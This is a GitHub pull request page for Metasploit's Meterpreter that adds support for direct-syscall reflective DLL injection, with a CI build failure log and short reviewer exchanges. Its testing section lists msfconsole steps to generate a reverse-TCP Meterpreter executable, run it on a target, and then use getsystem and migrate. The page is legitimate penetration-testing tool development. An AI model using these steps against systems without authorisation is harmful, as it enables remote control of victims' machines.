Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Pull in changes from ReflectiveDLLInjection to support direct syscalls #688

Closed

Conversation

cdelafuente-r7
Copy link
Contributor

@cdelafuente-r7 cdelafuente-r7 commented Dec 4, 2023

This PR adds the necessary changes to support the direct syscalls version of ReflectiveDLLInjection. At this time, the related PR is still under review but it is possible to test by updating the ReflectiveDLLInjection submodule reference:

cd c/meterpreter/source/ReflectiveDLLInjection
git remote add rdi_direct_syscalls [email protected]:cdelafuente-r7/ReflectiveDLLInjection.git
git fetch rdi_direct_syscalls
git checkout rdi_direct_syscalls/direct_syscalls

Don't forget to git fetch/git checkout again if the ReflectiveDLLInjection branch is updated.

Follow the standard documentation to build Meterpreter on Windows and with MinGW.

Note that CI is failing because the ReflectiveDLLInjection submodule needs to be updated to point to the direct syscalls implementation.

Testing with MSF

Once the DLL's are built, you need to copy output/ directory content into the Metasploit Framework's data/meterpreter/ directory.

Then in MSF console, test Meterpreter payloads (staged and single).
For example:

  • use windows/x64/meterpreter_reverse_tcp
  • set LHOST <your host IP>
  • generate -f exe -o direct_syscalls_payload.exe
  • to_handler
  • move direct_syscalls_payload.exe to the target and execute it, you should get a session.
  • make sure it you get the warning saying local DLL's.are beging used: WARNING: Local file .../data/meterpreter/ext_server_stdapi.x64.dll is being used
  • make sure you load extensions, migrate, getsystem, etc. without issues.

@adfoster-r7
Copy link
Contributor

Looks like a CI failure on mingw

Digest: sha256:a733f4ab29ed04a0e29e39e9e602efcbfc40512b3800f69078643ac13bd0ac77
Status: Downloaded newer image for rapid7/msf-ubuntu-x64-meterpreter:latest
^@-- The C compiler identification is GNU 9.3.0
-- Check for working C compiler: /usr/bin/x86_64-w64-mingw32-gcc
-- Check for working C compiler: /usr/bin/x86_64-w64-mingw32-gcc -- works
-- Detecting C compiler ABI info
-- Detecting C compiler ABI info - done
-- Detecting C compile features
-- Detecting C compile features - done
-- Build Type not specified, defaulting to 'Release'.
-- The ASM compiler identification is GNU
-- Found assembler: /usr/bin/x86_64-w64-mingw32-as
-- Configuring done
CMake Error at ReflectiveDLLInjection/CMakeLists.txt:19 (add_library):
  Cannot find source file:

    ../../source/ReflectiveDLLInjection/dll/src/GateTrampoline64.s

  Tried extensions .c .C .c++ .cc .cpp .cxx .cu .m .M .mm .h .hh .h++ .hm
  .hpp .hxx .in .txx


CMake Error at ReflectiveDLLInjection/CMakeLists.txt:19 (add_library):
  No SOURCES given to target: ReflectiveDLLInjection


CMake Generate step failed.  Build files cannot be regenerated correctly.
make: *** [Makefile:24: meterpreter-x86-gen] Error 1
make: *** [Makefile:296: docker] Error 2

@cdelafuente-r7
Copy link
Contributor Author

It is expected since the ReflectiveDLLInjection submodule needs to point to the new direct syscalls implementation.

@adfoster-r7
Copy link
Contributor

Ah; Is it worth temporarily updating the submodule config file to point to your branch so we can verify CI passes here? 👀

@cdelafuente-r7
Copy link
Contributor Author

Thanks @adfoster-r7 for the suggestion, I've updated the submodule config in the last commit. CI passes now.

@adfoster-r7
Copy link
Contributor

Cool! 🎉

For visibility, I've created a PR to run the Windows compilation on VS2019 over here now too - #689

@cdelafuente-r7
Copy link
Contributor Author

Closing it since a new updated PR exists.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

Successfully merging this pull request may close these issues.

3 participants